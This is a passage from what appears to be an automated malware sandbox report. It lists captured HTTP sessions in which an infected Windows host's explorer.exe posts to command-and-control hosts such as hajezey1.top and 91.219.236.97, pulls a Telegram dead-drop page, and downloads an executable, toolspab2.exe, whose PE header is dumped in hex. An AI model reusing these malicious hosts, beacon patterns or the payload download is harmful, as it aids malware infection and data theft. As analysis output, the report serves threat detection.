                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  48192.168.2.749807185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:11.633338928 CEST8147OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://tkhdy.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 212
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:11.711445093 CEST8148INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:11 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  49192.168.2.749808185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:11.826704025 CEST8148OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://hhnkknumd.org/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 315
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:30:11.905286074 CEST8149INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:30:11 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.749747185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:20.944181919 CEST724OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://rctoc.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 154
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:21.022907019 CEST725INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:20 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 19{i+,GO0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  50192.168.2.749811172.67.160.4680
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:34.785027981 CEST8166OUTGET /agrybirdsgamerept HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: text/plain; charset=UTF-8
                                                  Host: toptelete.top
                                                  Oct 29, 2021 20:30:35.011461020 CEST8167INHTTP/1.1 200 OK
                                                  Date: Fri, 29 Oct 2021 18:30:35 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  set-cookie: stel_ssid=ecc739c305f707721e_286221579877052833; expires=Sat, 30 Oct 2021 18:30:34 GMT; path=/; samesite=None; secure; HttpOnly
                                                  pragma: no-cache
                                                  cache-control: no-store
                                                  strict-transport-security: max-age=35768000
                                                  access-control-allow-origin: *
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gbkjoW9dkaRTs9hARjHu%2FL%2F%2B8lhbecZzAgpZl6DPbZRKRLkhOKPKgRg2HdkjQTvtgldHkHdSJH0J8EB7L3haSqQ5z%2B%2BkfEW%2F5WPyP8xGWGEs3xwBq42AU%2BgA0QovqfsB"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 6a5e79d37d95d70d-FRA
                                                  Data Raw: 31 31 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 37 61 63 38 61 71 38 39 65 6e 44 70 48 45 46 4f 49 52 75 4b 31 57 30 76 31 73 46 30 71 43 36 2f 34 62 62 2d 76 31 36 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65
                                                  Data Ascii: 11ef<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta property="og:image" content="https://telegram.org/img/t_logo.png"><meta property="og:site_name" content="Telegram"><meta property="og:description" content="7ac8aq89enDpHEFOIRuK1W0v1sF0qC6/4bb-v16"><meta property="twitter:title" content="agrybirdsgamerept"><me


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  51192.168.2.74981291.219.236.9780
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:30:35.072803974 CEST8172OUTPOST / HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: text/plain; charset=UTF-8
                                                  Content-Length: 132
                                                  Host: 91.219.236.97
                                                  Oct 29, 2021 20:30:35.410000086 CEST8173INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 29 Oct 2021 18:30:35 GMT
                                                  Content-Type: text/plain;charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Vary: Accept-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  Data Raw: 32 34 61 38 0d 0a 68 52 6b 67 67 6a 6a 72 50 74 45 64 41 30 30 35 6a 51 47 69 34 37 6e 51 44 42 35 4c 68 51 55 4d 36 6d 61 2b 4b 50 63 74 74 74 36 55 74 65 2f 67 56 5a 4b 73 63 66 36 7a 36 79 55 32 30 38 43 41 67 4b 5a 2b 61 78 37 52 50 4d 37 4d 63 75 4e 4c 58 6d 46 66 45 4b 75 6c 48 4d 74 2b 33 69 43 64 34 4f 55 2f 39 46 50 4e 53 49 6b 69 42 64 34 79 59 79 74 52 4c 77 6b 48 49 6a 38 33 66 50 45 6c 32 6c 46 67 6d 65 46 47 6d 32 68 66 31 47 73 77 42 4b 2b 6e 75 66 77 49 32 77 34 59 45 33 47 55 57 68 37 76 74 58 4f 54 4d 69 61 7a 6f 52 71 46 42 74 45 53 73 33 4a 41 45 55 64 4f 45 55 70 41 39 74 59 6c 79 34 77 66 31 37 30 58 6f 35 57 32 4f 41 37 73 6b 64 44 72 32 6d 61 36 4f 70 49 48 35 77 30 49 39 56 45 50 68 64 52 6c 46 52 66 62 38 39 36 48 33 54 69 56 61 37 41 2b 4d 32 37 76 77 64 78 4c 59 47 5a 2f 31 43 62 6a 54 65 59 4d 66 56 53 6c 43 58 30 4f 2f 4a 4c 59 64 57 63 66 44 75 50 4d 38 6d 41 76 75 32 46 70 48 2f 46 78 36 66 5a 36 32 50 7a 62 57 6a 6e 5a 47 72 39 2b 69 77 33 64 34 62 46 2f 67 6d 77 74 6c 4b 4a 64 30 50 59 75 38 6e 45 47 45 2b 73 31 36 46 33 4d 2f 35 72 6c 65 53 44 70 61 6d 62 43 38 44 77 58 37 47 43 37 71 65 37 5a 47 65 33 71 67 58 38 34 46 42 6e 77 39 41 34 59 79 51 6a 65 4f 48 53 6c 70 4c 4d 39 6a 4c 6f 75 73 6e 33 70 34 6a 7a 74 4c 35 46 41 38 79 66 73 6e 76 6e 52 79 4d 6a 34 4d 42 6a 50 6d 79 77 42 64 5a 38 6d 57 59 34 46 54 50 66 45 33 61 6b 31 74 61 61 79 61 33 38 37 78 74 58 51 4c 33 38 2f 4e 4d 35 4b 55 73 2f 59 68 64 79 32 4e 4d 53 33 4f 4d 55 74 4a 59 68 35 61 43 70 34 59 37 33 6e 30 54 44 4d 7a 79 6c 56 54 66 79 30 63 58 59 77 4b 46 74 7a 74 2b 2b 67 74 51 2b 45 2f 4a 33 57 6f 49 70 30 62 6f 4f 79 77 79 6a 48 6c 6a 54 49 4d 71 63 63 68 30 56 4b 56 62 73 4c 73 50 77 30 46 69 53 66 37 2f 62 2f 42 72 39 68 53 5a 68 35 6d 5a 44 52 6d 70 33 34 2f 33 47 76 77 39 61 42 71 6f 72 65 65 44 32 30 51 33 75 42 53 5a 33 44 32 70 36 39 4e 52 78 49 50 32 73 67 65 39 70 70 4e 63 52 5a 43 42 33 44 56 79 41 72 73 43 47 30 6c 4e 52 4d 31 65 66 61 75 58 2f 73 79 61 2f 63 70 63 7a 54 70 77 71 4a 30 34 4f 5a 59 47 30 77 69 75 6f 4f 51 42 52 71 53 30 55 62 74 78 37 38 2b 4d 42 6f 49 63 79 41 47 55 45 57 31 41 61 5a 6f 65 76 45 4b 67 38 68 4d 55 57 6b 4f 54 52 2b 32 55 41 74 6c 46 37 4d 4a 2f 2f 6b 38 48 67 6c 74 70 4b 4c 79 76 68 63 4d 32 6d 5a 2f 51 54 4d 53 58 58 38 65 74 59 79 56 41 4b 72 2b 48 69 65 41 30 6a 77 6e 66 51 30 73 6f 38 6d 41 74 55 4d 74 72 6b 68 6d 4d 4e 76 6d 6c 47 76 64 77 43 5a 31 6d 62 34 50 41 70 53 38 42 50 61 44 68 39 75 63 38 4f 41 6e 59 49 48 71 30 35 42 72 64 33 38 44 70 4d 79 47 46 33 4a 37 64 4b 76 56 56 78 63 39 6b 47 63 2b 4d 31 68 74 56 78 36 51 56 7a 6d 69 77 65 58 4e 58 50 30 77 53 46 77 2b 34 36 79 69 30 33 36 30 62 6a 71 49 73 30 64 4b 39 49 4e 7a 6d 4f 73 41 5a 47 77 38 33 67 44 43 53 33 41 42 62 32 6e 53 65 42 4a 71 4c 41 43 73 68 41 36 73 4b 2f 79 46 32 56 44 6b 6a 42 75 57 49 30 6a 4e 67 32 75 33 4d 39 57 6a 53 73 46 39 4b 71 2b 6b 69 79 66 2b 5a 47 5a 4f 52 56 43 6d 46 4c 75 55 76 64 6a 78 46 46 34 48 58 55 42 6f 51 71 6f 6f 31 39 6a 78 31 51 4e 6f 56 37 74 74 76 72 57 5a 52 66 4e 54 39 4d 74 4e 56 52 41 63 47 68 5a 46 79 31 6a 7a 7a 2f 4b 48 79 42 58 77 63 55 35 37 6a 34 4c 6d 65 35 51 63 6e 30 74 31 66 63 49 30 59 34 2b 59 4f 4b 6a 56 31 47 59 30 67 50 73 35 67 6e 4b 74 61 30 72 6d 6f 54 61 71 57 69 34 34 44 77 43 77 42 6a 4a 63 33 52 69 46 78 30 41 68 52
                                                  Data Ascii: 24a8hRkggjjrPtEdA005jQGi47nQDB5LhQUM6ma+KPcttt6Ute/gVZKscf6z6yU208CAgKZ+ax7RPM7McuNLXmFfEKulHMt+3iCd4OU/9FPNSIkiBd4yYytRLwkHIj83fPEl2lFgmeFGm2hf1GswBK+nufwI2w4YE3GUWh7vtXOTMiazoRqFBtESs3JAEUdOEUpA9tYly4wf170Xo5W2OA7skdDr2ma6OpIH5w0I9VEPhdRlFRfb896H3TiVa7A+M27vwdxLYGZ/1CbjTeYMfVSlCX0O/JLYdWcfDuPM8mAvu2FpH/Fx6fZ62PzbWjnZGr9+iw3d4bF/gmwtlKJd0PYu8nEGE+s16F3M/5rleSDpambC8DwX7GC7qe7ZGe3qgX84FBnw9A4YyQjeOHSlpLM9jLousn3p4jztL5FA8yfsnvnRyMj4MBjPmywBdZ8mWY4FTPfE3ak1taaya387xtXQL38/NM5KUs/Yhdy2NMS3OMUtJYh5aCp4Y73n0TDMzylVTfy0cXYwKFtzt++gtQ+E/J3WoIp0boOywyjHljTIMqcch0VKVbsLsPw0FiSf7/b/Br9hSZh5mZDRmp34/3Gvw9aBqoreeD20Q3uBSZ3D2p69NRxIP2sge9ppNcRZCB3DVyArsCG0lNRM1efauX/sya/cpczTpwqJ04OZYG0wiuoOQBRqS0Ubtx78+MBoIcyAGUEW1AaZoevEKg8hMUWkOTR+2UAtlF7MJ//k8HgltpKLyvhcM2mZ/QTMSXX8etYyVAKr+HieA0jwnfQ0so8mAtUMtrkhmMNvmlGvdwCZ1mb4PApS8BPaDh9uc8OAnYIHq05Brd38DpMyGF3J7dKvVVxc9kGc+M1htVx6QVzmiweXNXP0wSFw+46yi0360bjqIs0dK9INzmOsAZGw83gDCS3ABb2nSeBJqLACshA6sK/yF2VDkjBuWI0jNg2u3M9WjSsF9Kq+kiyf+ZGZORVCmFLuUvdjxFF4HXUBoQqoo19jx1QNoV7ttvrWZRfNT9MtNVRAcGhZFy1jzz/KHyBXwcU57j4Lme5Qcn0t1fcI0Y4+YOKjV1GY0gPs5gnKta0rmoTaqWi44DwCwBjJc3RiFx0AhR


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  6192.168.2.749748185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:21.109474897 CEST726OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://cufneavefi.net/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 207
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:21.187556982 CEST726INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:21 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 46I:82OOj{CUg%EQAc}yc0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  7192.168.2.749749185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:21.273890018 CEST727OUTGET /downloads/toolspab2.exe HTTP/1.1
                                                  Connection: Keep-Alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: privacytoolzforyou-6000.top
                                                  Oct 29, 2021 20:29:21.423413038 CEST728INHTTP/1.1 200 OK
                                                  Date: Fri, 29 Oct 2021 18:29:21 GMT
                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                  Last-Modified: Fri, 29 Oct 2021 18:29:01 GMT
                                                  ETag: "54000-5cf820050e185"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 344064
                                                  Connection: close
                                                  Content-Type: application/octet-stream
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 36 ca 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 be 03 00 00 c4 70 02 00 00 00 00 40 c3 01 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 74 02 00 04 00 00 31 96 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c1 03 00 50 00 00 00 00 50 73 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 73 02 3c 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 bc 03 00 00 10 00 00 00 be 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 d0 03 00 00 16 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 75 66 75 6c 61 63 e5 02 00 00 00 40 73 02 00 04 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 50 73 02 00 40 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 90 73 02 00 24 01 00 00 1c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CtwCtwCtw,ntw,atw,<twJDtwCtv<tw,Btw,Btw,BtwRichCtwPEL6`p@@t1PPs?s<0@.text `.dataio@.lufulac@s@.rsrc?Ps@@@.reloc"s$@B


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  8192.168.2.749756185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:24.119602919 CEST1423OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ctxsek.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 319
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:24.198115110 CEST1424INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:24 GMT
